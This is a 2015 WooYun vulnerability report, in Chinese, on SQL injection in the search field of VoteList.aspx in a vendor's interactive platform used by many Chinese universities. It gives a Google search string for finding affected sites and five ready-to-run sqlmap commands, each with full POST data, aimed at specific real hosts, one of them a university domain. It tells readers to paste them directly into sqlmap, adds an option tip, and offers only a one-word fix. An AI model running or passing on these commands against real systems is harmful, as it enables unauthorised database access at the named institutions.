当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091245

漏洞标题:某系统SQL注射漏洞,影响大量高校1#

相关厂商:力拓网络科技

漏洞作者: limbo

提交时间:2015-01-18 20:08

修复时间:2015-04-18 20:10

公开时间:2015-04-18 20:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

问题厂商:力拓网络科技
问题程序:该公司旗下的互动平台
谷歌搜索:
"技术支持:力拓网络科技" 互动

屏幕截图(575).png


影响的是一些高校
VoteList.aspx 里的ctl00%24Content%24txtSearch参数存在注入
是搜索框
抓包可得数据
来5个案例~
http://183.64.83.109/hudong/VoteList.aspx --data "__VIEWSTATE=%2FwEPDwUJNTk0MTc3NzAyD2QWAmYPZBYCAgcPZBYEAgIPFgIeC18hSXRlbUNvdW50ZmQCAw9kFgYCAQ8WAh8AZmQCAw8WAh8AZmQCBQ8WAh8AZmRkWqzsjl7gZ9Hn8cvCLyoNIbDxHj0rdSOY0qNtBGECmto%3D&__EVENTVALIDATION=%2FwEWAwLmoOOqCQKUo4ebDwKU5KLrCKYhDKvnR0aykMLEP%2FT11baIO9BM3OFS81eQs4btcpOS&ctl00%24Content%24txtSearch=aaa&ctl00%24Content%24btnSearch=%E6%90%9C%E7%B4%A2" -p ctl00%24Content%24txtSearch
http://219.222.244.59:6006/VoteList.aspx --data "__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE5NTY1MDEwMjAPZBYCZg9kFgICBw9kFgYCAQ9kFgQCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQROYW1lHg5EYXRhVmFsdWVGaWVsZAUCSUQeC18hRGF0YUJvdW5kZ2QQFQEG5YWo6YOoFQEBMBQrAwFnFgFmZAIDDxAPFgIfAmdkEBUBBuWFqOmDqBUBATAUKwMBZxYBZmQCAg8WAh4LXyFJdGVtQ291bnRmZAIDD2QWBgIBDxYCHwNmZAIDDxYCHwNmZAIFDxYCHwNmZGSde1%2FYRyplEVcWTh7X3ikQxYOFTg%3D%3D&__VIEWSTATEGENERATOR=7EBB9B0A&__EVENTVALIDATION=%2FwEWBwKruosfAqDU8%2BsJArC72YUFAqji9NUMAriN3jsClKOHmw8ClOSi6wi9giGjZMFX1g5jsc04aasEHFe8qA%3D%3D&ctl00%24Content%24ddPro=0&ctl00%24Content%24ddSub=0&ctl00%24Content%24txtSearch=j&ctl00%24Content%24btnSearch=%E6%90%9C%E7%B4%A2" -p ctl00$Content$txtSearch
http://119.145.248.165:83/VoteList.aspx --data "__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE5NTY1MDEwMjAPZBYCZg9kFgICBw9kFgYCAQ9kFgQCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQROYW1lHg5EYXRhVmFsdWVGaWVsZAUCSUQeC18hRGF0YUJvdW5kZ2QQFQUG5YWo6YOoNOWFieeUteWtkOaKgOacr%2BS4k%2BS4mi3lhYnnlLXmioDmnK%2FkuI5MRUTlupTnlKjmlrnlkJEx5YWJ55S15a2Q5oqA5pyv5LiT5LiaLeWFieWtpuWKoOW3peS4juajgOa1i%2BaWueWQkRjlhYnnlLXliLbpgKDmioDmnK%2FkuJPkuJoY57K%2B5a%2BG5py65qKw5oqA5pyv5LiT5LiaFQUBMAIxNQIxNgIxNwIxOBQrAwVnZ2dnZxYBZmQCAw8QDxYCHwJnZBAVAQblhajpg6gVAQEwFCsDAWcWAWZkAgIPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VBQExD%2BaYr%2BeahOWPkemAgeWIsAnmiLTlm5vnu7QBMQoyMDEzLTA5LTEyZAIDD2QWBgIBDxYCHwMCARYCZg9kFgJmDxUCATEP5piv55qE5Y%2BR6YCB5YiwZAIDDxYCHwMCAxYGZg9kFgJmDxUCATES5rWL6K%2BV6K%2Bd6aKY5L%2Bh5oGvZAIBD2QWAmYPFQIBMhvmnInnlpHpl67lj6%2Fku6Xmib7miJHllYrvvIFkAgIPZBYCZg8VAgEzC2ZmbWdtaG5oaHVqZAIFDxYCHwMCAxYGZg9kFgJmDxUCATEINDU2NjIxMTJkAgEPZBYCZg8VAgEyFWZkZmdoZ2hzZOS4jeaxguS4iuKApmQCAg9kFgJmDxUCATMk6K%2B36Zeu5bel56iL5YWJ5a2m5Z%2B656GA6Zq%2B5a2m5ZCX77yfZGRpHXzubD4rrBNsfsnT6RW3lhiLzA%3D%3D&__EVENTVALIDATION=%2FwEWCwLYq931DwKg1PPrCQKwu9mFBQKvu6WGBQKvu6GGBQKvu72GBQKvu%2FmFBQKo4vTVDAK4jd47ApSjh5sPApTkousIuJCx6%2F7GaEumNNLFGBlEnHQZsEc%3D&ctl00%24Content%24ddPro=0&ctl00%24Content%24ddSub=0&ctl00%24Content%24txtSearch=AA&ctl00%24Content%24btnSearch=%E6%90%9C%E7%B4%A2" -p ctl00%24Content%24txtSearch
http://119.146.188.82:83/VoteList.aspx --data "__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE5NTY1MDEwMjAPZBYCZg9kFgICBw9kFgYCAQ9kFgQCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQROYW1lHg5EYXRhVmFsdWVGaWVsZAUCSUQeC18hRGF0YUJvdW5kZ2QQFQIG5YWo6YOoDOaVsOaOp%2BaKgOacrxUCATABMhQrAwJnZxYBZmQCAw8QDxYCHwJnZBAVAQblhajpg6gVAQEwFCsDAWcWAWZkAgIPFgIeC18hSXRlbUNvdW50ZmQCAw9kFgYCAQ8WAh8DZmQCAw8WAh8DZmQCBQ8WAh8DAgUWCmYPZBYCZg8VAgExJ%2BiAgeW4iOaCqOWlve%2B8geaLluaLieacuuaXgeeahOearuW4puKApmQCAQ9kFgJmDxUCATIn6K%2B36Zeu5rG96L2m55qE55S15Yqo5py65aSp56qX77yI5Y%2Bv4oCmZAICD2QWAmYPFQIBMyfogIHluIjmgqjlpb3vvIHmi5bmi4nmnLrml4HnmoTnmq7luKbigKZkAgMPZBYCZg8VAgE0I%2Bivt%2BmXru%2B8jOi9puWGhVBU5YmN55qE5a2U6KaB6ZK74oCmZAIED2QWAmYPFQIBNSfogIHluIjvvIHvvIHvvIHlpoLkvZXmj5Dpq5jlpJblla7lkIjigKZkZLYegLs9XdejpDbkNKorNshugArr&__EVENTVALIDATION=%2FwEWCAKZ453PCwKg1PPrCQKwu9mFBQKuu9mFBQKo4vTVDAK4jd47ApSjh5sPApTkousIvkXWLUWkJbdgF0aGxkMRawvDfjM%3D&ctl00%24Content%24ddPro=0&ctl00%24Content%24ddSub=0&ctl00%24Content%24txtSearch=s&ctl00%24Content%24btnSearch=%E6%90%9C%E7%B4%A2" -p ctl00%24Content%24txtSearch
http://kjxyl.gdufs.edu.cn/hudong/VoteList.aspx --data "__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE5NTY1MDEwMjAPZBYCZg9kFgICBw9kFgYCAQ9kFgQCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQROYW1lHg5EYXRhVmFsdWVGaWVsZAUCSUQeC18hRGF0YUJvdW5kZ2QQFQIG5YWo6YOoDOWbvemZheWVhuWKoRUCATABMRQrAwJnZxYBZmQCAw8QDxYCHwJnZBAVAQblhajpg6gVAQEwFCsDAWcWAWZkAgIPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VBQExBTExMTExCeS%2Br%2BS4nOeFpwEwCjIwMTQtMDMtMjFkAgMPZBYGAgEPFgIfAwIBFgJmD2QWAmYPFQIBMQUxMTExMWQCAw8WAh8DZmQCBQ8WAh8DAgEWAmYPZBYCZg8VAgExC2hhamhmamthaGprZGTMp9jlurrWjxG0aTOfJy%2BA%2BjiKNA%3D%3D&__EVENTVALIDATION=%2FwEWCAL1q%2B6KAgKg1PPrCQKwu9mFBQKvu9mFBQKo4vTVDAK4jd47ApSjh5sPApTkousInWRIhDatCCqe4a%2FZsEmN28aHEwE%3D&ctl00%24Content%24ddPro=0&ctl00%24Content%24ddSub=0&ctl00%24Content%24txtSearch=d&ctl00%24Content%24btnSearch=%E6%90%9C%E7%B4%A2" -p ctl00%24Content%24txtSearch
直接复制进sqlmap跑就好了~
依次结果

屏幕截图(694).png


屏幕截图(695).png


屏幕截图(696).png


屏幕截图(697).png


屏幕截图(698).png


屏幕截图(699).png


屏幕截图(700).png


屏幕截图(701).png


屏幕截图(702).png


到此为止~

漏洞证明:

补补补
记得加个--no-cast

屏幕截图(727).png

修复方案:

过滤~

版权声明:转载请注明来源 limbo@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝